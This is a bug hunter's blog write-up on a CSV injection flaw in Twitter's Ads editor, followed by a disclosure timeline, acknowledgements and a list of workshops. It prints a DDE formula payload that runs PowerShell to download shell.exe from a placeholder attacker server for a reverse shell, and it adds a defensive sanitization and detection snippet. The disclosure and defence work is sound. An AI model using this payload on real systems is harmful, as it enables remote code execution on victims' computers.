Twitter CSV Injection - Going beyond Pop-Up Calculator to Taking Meterpreter Shell



Hi folks,

After a long time, I thought of publishing one of my findings. A while back I targeted the `Twitter` application in the hope of finding some juicy bugs. This time I was looking for something different from the usual XSS, SQLi and the like.


tl;dr - this finding exploits CSV injection, chained with a meterpreter payload, to gain a meterpreter session on the victim's local system.

How it started :- 

I was testing one of the Twitter features called 'Ads editor'.
According to Twitter, with Ads editor you can leverage the power of Excel to manage your campaigns at scale. That sounded interesting, since it relies on Excel. There is also an option under 'Edit access to account' with which the account admin can add different users and assign each a role [Roles are: Account Administrator, Ad Manager and Analyst].


By this point it was clear that I should check for a "CSV Injection Attack".


Proof of Concept :- 

I noticed that the `Name your audience` field was vulnerable to CSV injection, which could be chained with a meterpreter payload, resulting in client-side remote code execution.

I sent this bug report with all the details to the Twitter security team.

And I got the reply below.




But wait



HOPES ALIVE :)

I created a video POC of the full exploitation, in which I was able to get a reverse shell connection back to the attacker's machine by using the payload
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0



The payload works as follows: when the CSV file is opened, PowerShell is launched in the background and attempts to fetch the PowerSploit Invoke-Shellcode payload, which then attempts a reverse shell connection back to the attacker's server.
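The defender-side counterpart, as an added example that is not from the original post: export-side neutralization of formula-triggering cells following the OWASP CSV injection guidance, plus a detection check for cells shaped like the DDE payload above. The sample row with a benign `=cmd|'/C calc'!A0` cell is constructed for illustration.

```python
import csv
import io
import re

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Shape of the DDE-style payload discussed above: a formula trigger, a pipe
# separating the application from its arguments, then an "!cell" suffix.
DDE_PATTERN = re.compile(r"^\s*[=+\-@][^|]*\|.*!\s*[A-Za-z]+\d+\s*$")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would treat this cell as a formula, not text."""
    return value.startswith(FORMULA_TRIGGERS)


def looks_like_dde(value: str) -> bool:
    """Detection helper: flag cells shaped like cmd|'args'!A0 for review."""
    return DDE_PATTERN.match(value) is not None


def sanitize_cell(value: str) -> str:
    """Neutralize a formula trigger before export (OWASP CSV injection
    guidance): a leading apostrophe keeps the cell as literal text.
    Caveat: negative numbers such as "-5" are also prefixed, so apply this
    to free-text fields (like an audience name), not to numeric columns."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_rows(rows) -> str:
    """Write rows to CSV text with every cell sanitized and fully quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(str(cell)) for cell in row])
    return buf.getvalue()


# Constructed sample: a benign calculator payload in the audience-name column.
SAMPLE_ROWS = [["audience_name", "size"], ["=cmd|'/C calc'!A0", 120]]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

Running `looks_like_dde` over exported or imported cells is a cheap review signal; `sanitize_cell` is the fix that belongs in the export path itself.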

Well, what next..



This is what the life of a bug hunter looks like.

Moral Of The Story:- 
I had never tried going beyond the pop-up calculator whenever I submitted bugs related to CSV injection, but this one gave me an opportunity to take the exploitation further. So, on a positive note: accept things and then move on. And most importantly, if you fail? Well, try harder!

Vulnerability timeline:

Aug 14, 2016  : Reported to Twitter Security Team via the HackerOne platform.
Aug 17, 2016  : Report marked as "Duplicate".
Aug 17, 2016  : Report reopened and status changed to "Need More Info".
Aug 17, 2016  : Shared the video POC exploit.
Aug 23, 2016  : Report again marked as "Duplicate".
June 23, 2017 : Responsible disclosure as per HackerOne policy.

Hall Of Fame



I have been helping companies improve their security by finding vulnerabilities in their software and helping them patch them, and they have included me in their security acknowledgements pages for reporting valid security issues:






Google
Microsoft
Yahoo
Adobe
Redhat
AT&T
BlackBerry
Sony
General Motors
OWASP
Cobalt
Blockchain
OLX
Imgur
 

And many more...
 
Conference Talks

The Journey :- 

Back when I was a newbie in the infosec domain, I was trying to learn the basics through workshops and blogs. The most important question on my mind was where to start, so that I could take the first step up the ladder of this journey to become an ethical hacker.

Thankfully, by the grace of God, all my hard work paid off. [Big story]

My first talk was at the null Mumbai chapter. After that I started getting many invites from different colleges to conduct workshops on ethical hacking, and the journey of delivering talks began. There is no looking back now: I want to help all the beginners and support everyone hunting for the way to become a hacker or infosec geek. So, to make sure newbies avoid the struggle I faced at my beginning, I started helping and supporting them through this medium.

On this journey many people have asked, "You started giving seminars and conference talks, so is it for the money, fame, a publicity stunt, or what?" So here is the answer to all those people.


Let's come back to the present and see what this blog section is about.

I have conducted many security talks at different colleges and events, which I list in this section.

So if you want a security talk conducted at your college, drop me an email.
I would love to share the knowledge.


Year 2018

1] Got invited to conduct a workshop on "Ethical Hacking" at Sardar Patel Institute Of Technology

Venue details:- 
SPIT College - 14th Aug 2018

Audience :- 
MCA Department


Year 2017

1] Got invited to conduct a workshop on "Ethical Hacking - Security Attacks/Tools/Mitigation Techniques" at Shri Bhagubhai Mafatlal Polytechnic - SVKM

Venue details:- 
Shri Bhagubhai Mafatlal Polytechnic - 15th March 2017

Audience :- 
Department of Information Technology - Shri Bhagubhai Mafatlal Polytechnic

2] Got invited to conduct the "AICTE-ISTE approved Ethical Hacking workshop" at SIES Graduate School of Technology

Venue details:- 
SIES Graduate School of Technology, Vidyapuram, Sector 5, Nerul, Navi Mumbai - 2nd July 2017

Audience :- 
The Computer Engineering department of SIES Graduate School of Technology
AICTE-ISTE approved Ethical Hacking workshop
AICTE :- All India Council for Technical Education (AICTE)
ISTE  :- Indian Society for Technical Education (ISTE)

3] Got invited to conduct a workshop on "Ethical Hacking" at SNDT College - Shri M.D. Shah Mahila College of Arts and Commerce.

Venue details:- 
BJ Patel Rd, Near Liberty Garden, Malad West, Mumbai, Maharashtra 400064 - 9th September 2017

Audience :- 
BCA Students

Year 2016

1] Got invited to conduct "Cyber Security - Hands-On Workshops" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 8th Oct 2015

Audience :- 
Department of Information Technology and Masters of computer application

Year 2015

1] Got invited to conduct a workshop on "Cyber Security" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 3rd Oct 2015

Audience :- 
MCA Department

2] Conducted a workshop on "It's all about CSRF" at the null Mumbai Meet

Venue details :-
null Mumbai Meet 10 January 2015 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
It's all about CSRF
Year 2014

1] Conducted a workshop on "Wireless Security"

Venue details :-
null Mumbai Meet 13 September 2014 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
Wireless Security